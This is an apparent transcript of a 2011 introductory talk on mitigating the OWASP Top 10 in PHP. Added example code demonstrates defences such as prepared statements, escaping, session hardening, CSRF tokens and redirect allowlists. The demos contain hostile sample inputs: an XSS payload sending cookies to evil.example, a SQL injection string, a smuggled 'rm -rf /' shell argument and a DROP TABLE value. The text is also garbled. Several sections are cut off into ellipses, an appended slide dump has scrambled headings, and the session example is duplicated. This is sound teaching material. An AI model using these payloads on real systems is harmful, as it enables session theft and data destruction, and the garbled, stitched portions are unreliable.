SCARED STRAIGHT: MITIGATING OWASP TOP 10 WITH PHP

DISCLAIMER
•   I am NOT a "security expert"
•   But I know a little about web security
•   Taken SANS DEV422: Defending Web Application Security Essentials
•   I don't know everything

ASSUMPTIONS
•   This is an introduction-level talk
•   You know enough PHP to be dangerous
•   You've heard of some security vulns
•   Again, I don't know everything

TALK STRUCTURE
•   What is the risk?
•   Typical Impact
•   How is it exploited?
•   How to prevent it when using PHP?

OWASP: Open Web Application Security Project
http://www.owasp.org
•   Non-profit focused on improving security of application software
•   Focused on awareness of risks and education on mitigating those risks
•   Kansas City chapter meets every other month
    •   Next meeting: Thursday, February 10, 2011 at Johnson County Community College
    •   Free! No registration required, but RSVPs appreciated

OWASP Top 10 (2010)
Source: Dave Wichers OWASP Top 10 Presentation
INJECTION

WHAT IS IT?
Tricking an application into unintended commands in the data sent to an interpreter

Interpreter      Injection
Database         SQL Injection
Shell            Command Injection
File System      File Injection/Inclusion
PHP              PHP Injection

TYPICAL IMPACT
Technical Impact: SEVERE
•   Entire database read or modified
•   Access files on the filesystem
•   Uses a program's elevated privileges to carry out unauthorized execution

HOW IS IT EXPLOITED?
Source: Dave Wichers OWASP Top 10 Presentation

HOW TO PREVENT IT?
SYSTEM LEVEL (KU does this for you)
•   Limit access rights of your application accounts
    •   OS user and database accounts
•   Limit attack vectors
    •   Sandbox execution
    •   Firewall web-facing machine
    •   Close unused ports and services

APPLICATION LEVEL
"Filter Input, Escape Output"
Examples: HTML, SQL / Database
•   HTML Injection
•   SQL Injection - Prepared Statements (bind every user-supplied value; never build the SQL text from it)
Source: http://xkcd.com/327/
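Added example, not code from the original slides (the deck's own HTML and SQL snippets are not in the transcript): the string-built query beside the prepared-statement fix from the "SQL Injection - Prepared Statements" slide, plus the Shell row of the table. It runs against an in-memory SQLite database so it works offline; the table, its rows and the attacker input are constructed for the demo. With pdo_mysql you would additionally set PDO::ATTR_EMULATE_PREPARES to false so the server, not the driver, does the binding.

```php
<?php
// Added example (not from the original slides). Constructed schema, rows
// and attacker input; in-memory SQLite so it runs without a server.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$pdo->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// Classic payload: closes the string literal and appends an always-true OR;
// the query's own closing quote terminates the final literal.
$attacker = "x' OR '1'='1";

// VULNERABLE: user input becomes part of the SQL text, so the interpreter
// (the database) treats the quote and the OR as syntax, not as data.
function findUserVulnerable(PDO $pdo, string $name): array
{
    $sql = "SELECT id, name, role FROM users WHERE name = '$name'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: the query shape is sent first and the value is bound afterwards.
// The whole payload is compared as a literal name and matches nothing.
function findUserSafe(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT id, name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Prepared statements cover values only. Identifiers (table or column
// names, ORDER BY targets) cannot be bound; map them through an allowlist.
function orderUsersBy(PDO $pdo, string $column): array
{
    $allowed = ['name' => 'name', 'role' => 'role'];
    if (!isset($allowed[$column])) {
        throw new InvalidArgumentException('unknown sort column');
    }
    return $pdo->query("SELECT name FROM users ORDER BY {$allowed[$column]}")
               ->fetchAll(PDO::FETCH_COLUMN);
}

// Shell row of the table: never interpolate into a command line; quote the
// argument so the shell sees exactly one word, metacharacters included.
function buildListCommand(string $userPath): string
{
    return 'ls -l ' . escapeshellarg($userPath);
}

printf("vulnerable query returned %d row(s) for %s\n", count(findUserVulnerable($pdo, $attacker)), $attacker);
printf("prepared statement returned %d row(s) for %s\n", count(findUserSafe($pdo, $attacker)), $attacker);
echo implode(', ', orderUsersBy($pdo, 'role')), "\n";
echo buildListCommand('/tmp; rm -rf /'), "\n";
```

The vulnerable function returns every user for the payload, the prepared one returns none. Note that the allowlist, not the prepared statement, is what protects the ORDER BY clause: anything that reaches a shell, a file path or an include() needs the same kind of map rather than escaping.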
CROSS SITE SCRIPTING (XSS)

WHAT IS IT?
Malicious data delivered to an innocent user's browser
•   Single Request Exploit (reflected)
    •   Specially crafted URL injecting JavaScript or other defacement code
•   Persistent Request Exploit (stored)
    •   Saved in the file itself or more commonly in a database
    •   Delivered to all visitors just by visiting the page

TYPICAL IMPACT
Technical Impact: MODERATE
•   Steal stored browser data...
    •   Session IDs & cookies
    •   Account numbers
    •   Usernames
•   Deface website
•   Redirect user to phishing or malware site

HOW IS IT EXPLOITED?
Source: Dave Wichers OWASP Top 10 Presentation

HOW TO PREVENT IT?
"Filter Input, Escape Output"
•   Validate / Sanitize user input
•   Escape user input sent to a Database or the Browser

Filter Input
•   Use PHP filter_* methods
    http://www.php.net/manual/en/ref.filter.php

Escape Output
•   htmlentities() ??? MEH
    •   Escaping on its own only covers the HTML body and attribute contexts, and only when the charset is stated explicitly
•   http://htmlpurifier.org/
    •   For the case where users are allowed to submit HTML markup and it must be cleaned rather than escaped
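Added example, not code from the original slides, of "Filter Input, Escape Output" for the browser side: a filter_* validation on the way in and htmlspecialchars() with explicit flags and charset on the way out. The search form, the page-number parameter and the payload are constructed for the demo.

```php
<?php
// Added example (not from the original slides). Constructed inputs.
declare(strict_types=1);

// Filter input: reject anything that is not an integer in range rather than
// trying to strip "bad" characters out of it.
function readPageNumber(array $query): int
{
    $page = filter_var($query['page'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10000]]);
    return $page === false ? 1 : $page;
}

// Escape output for the HTML context. ENT_QUOTES covers both text nodes and
// quoted attribute values; the explicit charset matters because a mismatch
// lets multi-byte sequences smuggle a quote past the escaper.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Renders a search box that echoes the user's term back in an attribute and
// in the page body. With escaping the payload is displayed; without it the
// first double quote closes the attribute and the script tag is live.
function renderSearch(string $term, bool $escape = true): string
{
    $shown = $escape ? e($term) : $term;
    return '<input name="q" value="' . $shown . '">' . "\n"
         . '<p>Results for: ' . $shown . '</p>';
}

$payload = '"><script>document.location="http://evil.example/?c="+document.cookie</script>';

echo "--- vulnerable (raw echo) ---\n", renderSearch($payload, false), "\n";
echo "--- escaped ---\n", renderSearch($payload), "\n";
echo 'page=', readPageNumber(['page' => '2; DROP TABLE x']), "\n";
echo 'page=', readPageNumber(['page' => '7']), "\n";
```

e() is correct only for HTML body and attribute values. Data written into a script block needs json_encode() with JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT, and data placed in a URL needs rawurlencode(); when users may submit real markup (a comment with formatting) escaping is the wrong tool and a purifier such as HTML Purifier is needed.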
BROKEN AUTHENTICATION AND SESSION MANAGEMENT

WHAT IS IT?
Authentication or Sessions are improperly implemented
•   HTTP is "stateless"
•   HTTP sends credentials with every request
•   Credentials are usually a Session ID
•   Attack is possible when attacker gets a valid Session ID
•   Remember Firesheep?

TYPICAL IMPACT
Technical Impact: SEVERE
An attacker might be able to...
•   Login without a valid password
•   Change another user's personal info
•   Assume another user's identity by just clicking a link

HOW IS IT EXPLOITED?
Source: Dave Wichers OWASP Top 10 Presentation

HOW TO PREVENT IT?
•   Rely on strong authentication and session management controls
    •   Integrate Shibboleth into your application
•   Proper Session Storage
    •   Default config stores sessions in a global temp directory, shared with every other application running as the same web server user; set session.save_path to a directory only your application can read
•   Proper Session Regeneration
    •   Always run session_regenerate_id() after an escalation in authentication/authorization
•   Proper Session cookie handling
    •   Only allow session cookies over secure connections (the Secure flag)
    •   Only allow session cookies over HTTP, not JavaScript (the HttpOnly flag)
    •   Only allow session IDs in cookies, not in the URL (session.use_only_cookies)
•   Use HTTPS
    •   NEVER deliver unencrypted network traffic when in HTTPS
        http://test.ku.edu/page2.php   ==> http://webmedia.ku.edu/jquery.js
        https://test.ku.edu/page2.php  ==> https://webmedia.ku.edu/jquery.js
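Added example, not code from the original slides, that applies the storage, regeneration and cookie-handling points above in one session bootstrap plus a login function. It assumes PHP 7.4 or later (for the array form of session_set_cookie_params()); the save path, the user record and the password are constructed for the demo.

```php
<?php
// Added example (not from the original slides). Assumes PHP >= 7.4.
// The save path, user store and password are constructed for the demo.
declare(strict_types=1);

function startSecureSession(string $savePath): void
{
    // Proper session storage: a directory only this application can read,
    // instead of the shared system temp directory.
    ini_set('session.save_path', $savePath);

    // Only accept IDs from cookies, never from the URL, and reject IDs the
    // server did not issue (blocks session fixation with a pre-chosen ID).
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1');

    // Cookie flags: Secure (HTTPS only), HttpOnly (not readable from
    // JavaScript), SameSite to limit cross-site sending.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);

    session_start();
}

// Constructed user store; in real code the hash comes from your database.
function lookupUser(string $username): ?array
{
    static $users = null;
    $users ??= ['alice' => ['id' => 1, 'hash' => password_hash('correct horse', PASSWORD_DEFAULT)]];
    return $users[$username] ?? null;
}

function login(string $username, string $password): bool
{
    $user = lookupUser($username);
    // Verify against a dummy hash when the user is unknown so that response
    // time does not reveal which usernames exist.
    $hash = $user['hash'] ?? '$2y$10$' . str_repeat('0', 53);
    $ok = password_verify($password, $hash);
    if ($user === null || !$ok) {
        return false;
    }
    // Proper session regeneration: privilege just went up, so drop the
    // pre-login ID (which an attacker may have planted) and issue a new one.
    session_regenerate_id(true);
    $_SESSION['user_id']  = $user['id'];
    $_SESSION['login_at'] = time();
    return true;
}

function logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Usage inside a request handler (not run here: sessions need HTTP headers):
// startSecureSession('/var/lib/myapp/sessions');
// if (login($_POST['user'] ?? '', $_POST['pass'] ?? '')) { header('Location: /home.php'); exit; }
```

session.use_strict_mode is what makes the regeneration meaningful: without it PHP will happily adopt any session ID a cookie presents, so an attacker who can set a cookie on the victim's browser can know the ID in advance.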
INSECURE DIRECT OBJECT REFERENCES

WHAT IS IT?
Users without proper credentials can view secure data
•   Do any users have only partial access to certain types of system data?

TYPICAL IMPACT
Technical Impact: MODERATE
•   Depends on the value of the secure data
•   Flaws can compromise all data referenced by an insecure object

HOW IS IT EXPLOITED?
•   User clicks link "My Account"
•   User accesses "My Account" page at URL: http://mybank.com/account/2055
•   User increments parameter in the URL: http://mybank.com/account/2056
•   User is granted access

HOW TO PREVENT IT?
•   Use Array Map to Obfuscate URL Parameters
    •   A per-user map of indirect references (0, 1, 2...) replaces raw record IDs in the URL; the server still checks that the resolved record belongs to the user, since obfuscation alone is not access control
•   Use switch(...
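Added example, not code from the original slides, of the "array map" idea: the URL carries a per-session index, the server maps it back to the real record ID, and ownership is checked again before anything is returned. The account store and session contents are constructed for the demo.

```php
<?php
// Added example (not from the original slides). Constructed account store
// and session array standing in for $_SESSION.
declare(strict_types=1);

// Account id => owner user id and balance.
const ACCOUNTS = [
    2055 => ['owner' => 10, 'balance' => 120.00],
    2056 => ['owner' => 11, 'balance' => 9800.00],
];

function accountsOwnedBy(int $userId): array
{
    return array_keys(array_filter(ACCOUNTS, fn ($a) => $a['owner'] === $userId));
}

// Build the indirect map once per login: 0, 1, 2 ... are what the URL
// shows; the real IDs stay server-side in the session.
function buildAccountMap(array &$session, int $userId): array
{
    $session['account_map'] = array_values(accountsOwnedBy($userId));
    return $session['account_map'];
}

function accountLink(int $index): string
{
    return "http://mybank.com/account/$index";
}

// Resolve the URL parameter. Anything not in this user's map is rejected,
// and the ownership check is repeated against the store so a stale or
// tampered map can never hand out someone else's record.
function loadAccount(array $session, int $userId, string $param): ?array
{
    $index = filter_var($param, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($index === false || !isset($session['account_map'][$index])) {
        return null;
    }
    $realId  = $session['account_map'][$index];
    $account = ACCOUNTS[$realId] ?? null;
    if ($account === null || $account['owner'] !== $userId) {
        return null;
    }
    return ['id' => $realId] + $account;
}

// Demo: user 10 owns account 2055 only.
$session = [];
buildAccountMap($session, 10);
echo accountLink(0), "\n";                          // the only link user 10 is shown
var_dump(loadAccount($session, 10, '0'));           // user 10 opens their own account
var_dump(loadAccount($session, 10, '1'));           // user 10 increments the index, as on the exploit slide
var_dump(loadAccount($session, 10, '2056'));        // user 10 guesses the raw ID instead
```

Only the first lookup yields a record. The index is per user, so "account/1" means something different for every session, and the final owner comparison is what actually enforces access; dropping it and relying on the map being hard to guess would recreate the original flaw.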
CROSS SITE REQUEST FORGERY (CSRF)

WHAT IS IT?
Victim's browser is tricked into issuing a ...

TYPICAL IMPACT
Technical Impact: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
...
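Added example, not code from the original slides (the deck's prevention text for CSRF did not survive extraction): the synchronizer-token pattern, the standard PHP answer to a forged cross-site POST. The form field name, the transfer handler and the session array are constructed for the demo.

```php
<?php
// Added example (not from the original slides). Constructed session array,
// field name and handler.
declare(strict_types=1);

// One random token per session: stored server-side, emitted in every
// state-changing form, required back on every POST.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrfField(array &$session): string
{
    $t = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="_csrf" value="' . $t . '">';
}

// Constant-time comparison so the token cannot be recovered byte by byte.
function csrfValid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['_csrf'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// A money-transfer handler. A forged cross-site POST carries the victim's
// session cookie automatically, but the attacker's page cannot read the
// token out of the victim's form, so the request is refused.
function handleTransfer(array $session, array $post): string
{
    if (!csrfValid($session, $post)) {
        return '403 Forbidden: missing or invalid CSRF token';
    }
    return sprintf('transferred %s to %s', $post['amount'], $post['to']);
}

$session = [];
echo csrfField($session), "\n";
// Genuine form submission, token included:
echo handleTransfer($session, ['amount' => '100', 'to' => 'bob', '_csrf' => $session['csrf_token']]), "\n";
// Forged request from another origin, token unknown:
echo handleTransfer($session, ['amount' => '100', 'to' => 'mallory', '_csrf' => 'guess']), "\n";
```

The token only helps if every state change is a POST that checks it; a GET that transfers money is forgeable with an <img> tag no matter what. Setting the session cookie's SameSite attribute (see the session example above) is a second, independent layer.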
SECURITY MISCONFIGURATION

WHAT IS IT?
Running web applications on a secure foundation ...

TYPICAL IMPACT
Technical Impact: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
(KU does this for you)
...
INSECURE CRYPTOGRAPHIC STORAGE

WHAT IS IT?
Incorrectly storing and transmitting ...
What is considered secure data at KU? ...

TYPICAL IMPACT
Technical Impact: SEVERE
...
Business Impacts: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
Identify ...
FAILURE TO RESTRICT URL ACCESS

WHAT IS IT?
Unauthorized users can view private pages ...

TYPICAL IMPACT
Technical Impact: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
Check cr...
INSUFFICIENT TRANSPORT LAYER PROTECTION

WHAT IS IT?
Sending confidential data over ...

TYPICAL IMPACT
Technical Impact: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
...
UNVALIDATED REDIRECTS AND FORWARDS

WHAT IS IT?
URL Redirects built by the web application ...

TYPICAL IMPACT
Technical Impact: ...

HOW IS IT EXPLOITED?
...

HOW TO PREVENT IT?
Use Array...
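Added example, not code from the original slides: redirect targets come from a fixed array map keyed by a short name, so the request parameter can only select among destinations the application already knows, with a second helper for the case where a legacy link supplies a full path and it must be confirmed to stay on this site. The map, paths and request values are constructed for the demo.

```php
<?php
// Added example (not from the original slides). Constructed destination
// map and request values.
declare(strict_types=1);

// Allowed post-login destinations: relative paths on this site. The key is
// all the client is ever allowed to send.
const REDIRECTS = [
    'home'    => '/home.php',
    'profile' => '/account/profile.php',
    'grades'  => '/grades/index.php',
];

// Returns the Location value for a redirect parameter, falling back to the
// default when the parameter is absent or is not a known key.
function safeRedirectTarget(?string $param, string $default = 'home'): string
{
    if ($param !== null && array_key_exists($param, REDIRECTS)) {
        return REDIRECTS[$param];
    }
    return REDIRECTS[$default];
}

// If a full path must be accepted (legacy links), take it only when it is a
// relative path on this origin: no scheme, no host, no protocol-relative
// "//evil.example" or "/\evil.example" form, no CR/LF that could split the
// response header.
function sameSiteRelativePath(string $url): bool
{
    if (preg_match('/[\r\n]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return false;
    }
    $path   = $parts['path'] ?? '';
    $second = substr($path, 1, 1);
    return $path !== '' && $path[0] === '/' && $second !== '/' && $second !== '\\';
}

function redirect(string $target): string
{
    // In a real request: header('Location: ' . $target); exit;
    return 'Location: ' . $target;
}

echo redirect(safeRedirectTarget('profile')), "\n";                   // known key
echo redirect(safeRedirectTarget('http://evil.example/phish')), "\n";  // unknown key: default target
var_dump(sameSiteRelativePath('/grades/index.php?term=2011'));         // relative path on this site
var_dump(sameSiteRelativePath('//evil.example/phish'));                // protocol-relative, off-site
var_dump(sameSiteRelativePath('http://evil.example/'));                // absolute, off-site
var_dump(sameSiteRelativePath("/home\r\nSet-Cookie: x=y"));            // header injection attempt
```

Only the first of the four path checks passes. The key-based map is the simpler and safer of the two approaches; the path validator exists for the cases where the URL format cannot be changed, and it deliberately rejects anything parse_url() reports as having a host.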
Questions?

My Challenge to you
•   Read the OWASP Wiki: http://www.owasp.org
•   Review your code...

Sources
OWASP Sources:
•   OWASP Application Security Verification Standard Project. <http://www.owasp.org/index.php/ASVS>
•   OWA...
Overview of OWASP and its Top 10 Security Vulnerabilities. Strategies for protecting against common web application security vulnerabilities.

Presented at the January 2011 KU Web Developers meeting.
  1. 1. SCARED STRAIGHT MITIGATING OWASP TOP 10 WITH PHP
  2. 2. DISCLAIMER
  3. 3. DISCLAIMER• I am NOT a “security expert"
  4. 4. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security
  5. 5. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security• Taken SANS DEV422: Defending Web Application Security Essentials
  6. 6. DISCLAIMER• I am NOT a “security expert"• But I know a little about web security• Taken SANS DEV422: Defending Web Application Security Essentials• I don’t know everything
  7. 7. ASSUMPTIONS
  8. 8. ASSUMPTIONS• This is an introduction-level talk
  9. 9. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous
  10. 10. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous• You’ve heard of some security vulns
  11. 11. ASSUMPTIONS• This is an introduction-level talk• You know enough PHP to be dangerous• You’ve heard of some security vulns• Again, I don’t know everything
  12. 12. TALK STRUCTURE
  13. 13. TALK STRUCTURE• What is the risk?
  14. 14. TALK STRUCTURE• What is the risk?• Typical Impact
  15. 15. TALK STRUCTURE• What is the risk?• Typical Impact• How is it exploited?
  16. 16. TALK STRUCTURE• What is the risk?• Typical Impact• How is it exploited?• How to prevent it when using PHP?
  17. 17. OWASP http://www.owasp.org
  18. 18. OWASP
  19. 19. OpenWebApplicationSecurityProject
  20. 20. OWASP• Non-profit focused on improving security of application software• Focused on awareness of risks and education on mitigating those risks• Kansas City chapter meets every other month • Next meeting: Thursday, February 10, 2011 at Johnson County Community College • Free! No registration required, but RSVPs appreciated
  21. 21. http://www.owasp.org
  22. 22. OWASP Top 10 (2010) Source: Dave Wichers OWASP Top 10 Presentation
  23. 23. INJECTION
  24. 24. INJECTION SI T? I Tricking an application into unintended HATW commands in the data sent to an interpreter -Interpreter--- -Injection--- Database SQL Injection Shell Command Injection File System File Injection/Inclusion PHP PHP Injection
  25. 25. CT INJECTION PA IM IC AL Technical Impact: SEVERET YP Entire database read or modified Access files on the filesystem Uses a programs elevated privileges to carry out unauthorized execution
  26. 26. LO I TE D? INJECTION P T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  27. 27. T I T? INJECTION EN R EV P TOHOW
  28. 28. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL
  29. 29. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts
  30. 30. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts
  31. 31. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors
  32. 32. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution
  33. 33. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution Firewall web-facing machine
  34. 34. T I T? INJECTION EN R EV P TOHOW SYSTEM LEVEL Limit access rights of your application accounts OS user and database accounts Limit attack vectors Sandbox execution Firewall web-facing machine Close unused ports and services
  35. 35. T I T? INJECTION EN R EV P TO OW SYSTEM LEVELKU ITH D Limit access rights of your application accounts OES T OS user and database accounts HIS F OR YO Limit attack vectors Sandbox execution Firewall web-facing machine Close unused ports and services U
  36. 36. T I T? INJECTION EN R EV P TOHOW APPLICATION LEVEL “Filter Input, Escape Output” Examples: HTML SQL / DATABASE
  37. 37. T I T? INJECTION EN R EV P TOHOW HTML Injection
  38. 38. T I T? INJECTION EN R EV P TO SQL Injection - Prepared StatementsHOW
  39. 39. T I T? INJECTION EN R EV P TOHOW SQL Injection Source: http://xkcd.com/327/
  40. 40. CROSS SITE SCRIPTING (XSS)
  41. 41. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser
  42. 42. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit
  43. 43. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code
  44. 44. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit
  45. 45. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit Saved in the file itself or more commonly in a database
  46. 46. CROSS SITE SCRIPTING (XSS) ? IS IT AT Malicious data delivered to anW H innocent users browser Single Request Exploit Specially crafted URL injecting JavaScript or other defacement code Persistent Request Exploit Saved in the file itself or more commonly in a database Delivered to all visitors just by visiting the page
  47. 47. CROSS SITE SCRIPTING (XSS) CT PA IM Technical Impact: AL MODERATE ICT YP
  48. 48. CROSS SITE SCRIPTING (XSS) CT PA IM Technical Impact: AL MODERATE ICT YP Steal stored browser data... Session IDs & cookies Account numbers Usernames Deface website Redirect user to phishing or malware site
  49. 49. CROSS SITE SCRIPTING (XSS) LO I TE D? EXP SI T IHOW Source: Dave Wichers OWASP Top 10 Presentation
  50. 50. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TOHOW “Filter Input, Escape Output” Validate / Sanitize user input Escape user input sent to a Database or the Browser
  51. 51. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TOHOW
  52. 52. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW
  53. 53. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods
  54. 54. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods http://www.php.net/manual/en/ref.filter.php
  55. 55. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Filter InputHOW Use PHP filter_* methods http://www.php.net/manual/en/ref.filter.php
  56. 56. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW
  57. 57. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  58. 58. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  59. 59. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ???
  60. 60. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW htmlentities() ??? MEH
  61. 61. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW http://htmlpurifier.org/
  62. 62. CROSS SITE SCRIPTING (XSS) NT I T? VE P RE TO Escape OutputHOW http://htmlpurifier.org/
  63. 63. BROKEN AUTHENTICATIONAND SESSION MANAGEMENT
  64. 64. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented
  65. 65. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless”
  66. 66. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request
  67. 67. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID
  68. 68. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID Attack is possible when attacker gets a valid Session ID
  69. 69. BROKEN AUTHENTICATION IT?AND SESSION MANAGEMENT IS HAT Authentication or Sessions areW improperly implemented HTTP is “stateless” HTTP sends credentials with every request Credentials are usually a Session ID Attack is possible when attacker gets a valid Session ID Remember Firesheep?
  70. 70. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP
  71. 71. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to...
  72. 72. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password
  73. 73. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password Change another user’s personal info
  74. 74. BROKEN AUTHENTICATION PA AND SESSION MANAGEMENT CT L IM Technical Impact: CA SEVERE IT YP An attacker might be able to... Login without a valid password Change another user’s personal info Assume another user’s identity by just clicking a link
75. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
HOW IS IT EXPLOITED?
[diagram] Source: Dave Wichers OWASP Top 10 Presentation
76-80. BROKEN AUTHENTICATION AND SESSION MANAGEMENT
HOW TO PREVENT IT?
Rely on strong authentication and session management controls
• Integrate Shibboleth single sign-on into your application instead of writing your own login
Proper session storage
• The default config stores session files in a global temp directory, where every other site on a shared host can read them; give each application its own save path
Proper session regeneration
• Always run session_regenerate_id() after an escalation in authentication/authorization (login, role change), so a session ID an attacker planted before login is worthless afterwards
Proper session cookie handling
• Only send session cookies over secure connections (the Secure cookie flag)
• Only allow session cookies to be read by HTTP, not by JavaScript (the HttpOnly cookie flag)
• Only accept session IDs from cookies, never from the URL
Use HTTPS
• NEVER deliver unencrypted network traffic on an HTTPS page: one script loaded over plain HTTP can be swapped in transit and then reads everything on the page
  http://test.ku.edu/page2.php ==> http://webmedia.ku.edu/jquery.js
  https://test.ku.edu/page2.php ==> https://webmedia.ku.edu/jquery.js
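The four session controls above, collected into one bootstrap routine. This is an added example, not code from the slides; it assumes PHP 7.3 or later (for the array form of session_set_cookie_params), that the site is served over HTTPS, and that the save path /var/lib/php/sessions/myapp exists and is writable only by the web server user.

```php
<?php
// Added example: hardened session bootstrap for a PHP application.
// Assumptions: PHP >= 7.3, HTTPS everywhere, and a private session directory
// (/var/lib/php/sessions/myapp) that exists and is owned by the web server user.
declare(strict_types=1);

function startSecureSession(): void
{
    // Keep session files out of the shared /tmp that every site on the host can read.
    session_save_path('/var/lib/php/sessions/myapp');

    // The session ID travels only in a cookie, never in a URL or a hidden field.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // Refuse session IDs the server did not issue (blocks fixation with a made-up ID).
    ini_set('session.use_strict_mode', '1');

    session_set_cookie_params([
        'lifetime' => 0,          // expires when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,       // only sent over HTTPS (Firesheep sees nothing)
        'httponly' => true,       // not readable by document.cookie
        'samesite' => 'Lax',      // not attached to cross-site POSTs
    ]);

    session_start();
}

// Call only after the password (or the Shibboleth assertion) has been verified.
function loginUser(int $userId, string $role): void
{
    // New ID on every privilege change: a session the attacker fixed before login
    // is discarded and the old ID is deleted on the server (the `true` argument).
    session_regenerate_id(true);
    $_SESSION['user_id']    = $userId;
    $_SESSION['role']       = $role;
    $_SESSION['login_time'] = time();
}

function logoutUser(): void
{
    $_SESSION = [];
    // Expire the cookie in the browser with the same attributes it was set with.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 42000,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'] ?? 'Lax',
    ]);
    session_destroy();
}

// Typical page prologue:
//   startSecureSession();
//   if (!isset($_SESSION['user_id'])) { header('Location: /login.php'); exit; }
```
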